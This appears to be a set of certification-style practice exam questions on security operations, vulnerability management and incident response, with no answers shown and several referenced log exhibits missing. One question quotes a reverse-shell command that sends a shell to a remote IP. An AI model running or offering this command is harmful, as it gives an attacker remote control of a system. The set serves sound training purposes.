A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.

B. Write a removable media policy that explains that USBs cannot be connected to a company asset.

C. Check configurations to determine whether USB ports are enabled on company assets.

D. Review logs to see whether this exploitable vulnerability has already impacted the company.

While reviewing web server logs, a security analyst found the following line:

Which of the following malicious activities was attempted?

A. Command injection

B. XML injection

C. Server-side request forgery

D. Cross-site scripting

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?

A. Reduce the administrator and privileged access accounts

B. Employ a network-based IDS

C. Conduct thorough incident response

D. Enable SSO to enterprise applications

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?

A. The finding is a false positive and should be ignored.

B. A rollback had been executed on the instance.

C. The vulnerability scanner was configured without credentials.

D. The vulnerability management software needs to be updated.

A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation. Which of the following vulnerabilities should have the highest priority for the mitigation process?

A. A vulnerability that has related threats and IoCs, targeting a different industry

B. A vulnerability that is related to a specific adversary campaign, with IoCs found in the SIEM

C. A vulnerability that has no adversaries using it or associated IoCs

D. A vulnerability that is related to an isolated system, with no IoCs

An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?

A. Disable the user’s network account and access to web resources.

B. Make a copy of the files as a backup on the server.

C. Place a legal hold on the device and the user’s network share.

D. Make a forensic image of the device and create a SHA-1 hash.

The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?

A. PCI DSS

B. COBIT

C. ISO 27001

D. ITIL

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

A. Hacktivist threat

B. Advanced persistent threat

C. Unintentional insider threat

D. Nation-state threat

A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for classifying data?

A. To identify regulatory compliance requirements

B. To facilitate the creation of DLP rules

C. To prioritize IT expenses

D. To establish the value of data to the organization

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

A. Credentialed network scanning

B. Passive scanning

C. Agent-based scanning

D. Dynamic scanning

The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?

A. Single pane of glass

B. Single sign-on

C. Data enrichment

D. Deduplication

An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the best step for the security team to take to ensure compliance with the request?

A. Publicly disclose the request to other vendors

B. Notify the departments involved to preserve potentially relevant information

C. Establish a chain of custody starting with the attorney’s request

D. Back up the mailboxes on the server and provide the attorney with a copy

Which of the following best describes the goal of a tabletop exercise?

A. To test possible incident scenarios and how to react properly

B. To perform attack exercises to check response effectiveness

C. To understand existing threat actors and how to replicate their techniques

D. To check the effectiveness of the business continuity plan

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

A. Deploy a database to aggregate the logging

B. Configure the servers to forward logs to a SIEM

C. Share the log directory on each server to allow local access.

D. Automate the emailing of logs to the analysts.

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?

A. Mean time to detect

B. Mean time to respond

C. Mean time to remediate

D. Service-level agreement uptime

A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?

A. SIEM

B. XDR

C. SOAR

D. EDR

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

A. Isolate Joe’s PC from the network

B. Reimage the PC based on standard operating procedures

C. Initiate a remote wipe of Joe’s PC using mobile device management

D. Perform no action until HR or legal counsel advises on next steps

An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R
Which of the following represents the exploit code maturity of this critical vulnerability?

A. E:U

B. S:C

C. RC:R

D. AV:N

E. AC:L

Which of the following evidence collection methods is most likely to be acceptable in court cases?

A. Copying all access files at the time of the incident

B. Creating a file-level archive of all files

C. Providing a full system backup inventory

D. Providing a bit-level image of the hard drive

Which of the following is a reason proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?

A. To ensure the report is legally acceptable in case it needs to be presented in court

B. To present a lessons-learned analysis for the incident response team

C. To ensure the evidence can be used in a postmortem analysis

D. To prevent the possible loss of a data source for further root cause analysis

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

A. C2 beaconing activity

B. Data exfiltration

C. Anomalous activity on unexpected ports

D. Network host IP address scanning

E. A rogue network device

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:
 
Which of the following tuning recommendations should the security analyst share?

A. Set an HttpOnly flag to force communication by HTTPS

B. Block requests without an X-Frame-Options header

C. Configure an Access-Control-Allow-Origin header to authorized domains

D. Disable the cross-origin resource sharing header

Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?

A. MOU

B. NDA

C. BIA

D. SLA

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?

A. Scan the employee’s computer with virus and malware tools

B. Review the actions taken by the employee and the email related to the event

C. Contact human resources and recommend the termination of the employee

D. Assign security awareness training to the employee involved in the incident

A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the organization’s environment. An analyst views the details of these events below:
 
Which of the following statements best describes the intent of the attacker, based on this one-liner?

A. Attacker is escalating privileges via JavaScript.

B. Attacker is utilizing custom malware to download an additional script.

C. Attacker is executing PowerShell script “AccessToken.ps1”.

D. Attacker is attempting to install persistence mechanisms on the target machine.

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

A. Running regular penetration tests to identify and address new vulnerabilities.

B. Conducting regular security awareness training of employees to prevent social engineering attacks.

C. Deploying an additional layer of access controls to verify authorized individuals.

D. Implementing intrusion detection software to alert security teams of unauthorized access attempts

A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.)

A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level

B. Review the headers from the forwarded email

C. Examine the recipient address field

D. Review the Content-Type header

E. Evaluate the HELO or EHLO string of the connecting email server

F. Examine the SPF, DKIM, and DMARC fields from the original email

A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?

A. Enabling a user account lockout after a limited number of failed attempts

B. Installing a third-party remote access tool and disabling RDP on all devices

C. Implementing a firewall block for the remote system’s IP address

D. Increasing the verbosity of log-on event auditing on all devices

A company has decided to expose several systems to the internet. The systems are currently available internally only. A security analyst is using a subset of CVSS3.1 exploitability metrics to prioritize the vulnerabilities that would be the most exploitable when the systems are exposed to the internet. The systems and the vulnerabilities are shown below:
 
Which of the following systems should be prioritized for patching?

A. brown

B. grey

C. blane

D. sullivan

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?

A. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }

B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }

To minimize the impact of a security incident, a cybersecurity analyst has configured audit settings in the organization’s cloud services. Which of the following security controls has the analyst configured?

A. Preventive

B. Corrective

C. Directive

D. Detective

A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?

A. Service-level agreement

B. Change management plan

C. Incident response plan

D. Memorandum of understanding

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

A. Leave the proxy as is.

B. Decomission the proxy.

C. Migrate the proxy to the cloud.

D. Patch the proxy.

A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?

A. Potential precursor to an attack

B. Unauthorized peer-to-peer communication

C. Rogue device on the network

D. System updates.

An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?

A. Any discovered vulnerabilities will not be remediated.

B. An outage of machinery would cost the organization money.

C. Support will not be available for the critical machinery.

D. There are no compensating controls in place for the OS.

A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notifications according to company policy. Which of the following technologies was deployed?

A. SIEM

B. SOAR

C. IPS

D. CERT

A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?

A. OSSTMM

B. Diamond Model of Intrusion Analysis

C. OWASP

D. MITRE ATT&CK

After reviewing the final report for a penetration test, a cybersecurity analyst prioritizes the remediation for input validation vulnerabilities. Which of the following attacks is the analyst seeking to prevent?

A. DNS poisoning

B. Pharming

C. Phishing

D. Cross-site scripting

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

A. Log retention

B. Log rotation

C. Maximum log size

D. Threshold value

Which of the following risk management principles is accomplished by purchasing cyber insurance?

A. Accept

B. Avoid

C. Mitigate

D. Transfer

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

A. Nmap

B. TCPDump

C. SIEM

D. EDR

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Choose two.)

A. Performing dynamic application security testing

B. Reviewing the code

C. Fuzzing the application

D. Debugging the code

E. Implementing a coding standard

F. Implementing IDS

A security analyst is reviewing the following alert that was triggered by FIM on a critical system:
 
Which of the following best describes the suspicious activity that is occurring?

A. A fake antivirus program was installed by the user.

B. A network drive was added to allow exfiltration of data.

C. A new program has been set to execute on system start.

D. The host firewall on 192.168.1.10 was disabled.

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

A. Agree on the goals and objectives of the plan

B. Determine the site to be used during a disaster

C. Demonstrate adherence to a standard disaster recovery process

D. Identify applications to be run during a disaster

An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?

A. DLP

B. NAC

C. EDR

D. NIDS

A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst should properly document the incident?

A. Back up the configuration file for all network devices.

B. Record and validate each connection.

C. Create a full diagram of the network infrastructure.

D. Take photos of the impacted items.

A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?

A. Corrective controls

B. Compensating controls

C. Operational controls

D. Administrative controls

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?

A. RCE

B. Reverse shell

C. XSS

D. SQL injection

A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?

A. Generate a hash value and make a backup image.

B. Encrypt the device to ensure confidentiality of the data.

C. Protect the device with a complex password.

D. Perform a memory scan dump to collect residual data

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

A. Risk register

B. Vulnerability assessment

C. Penetration test

D. Compliance report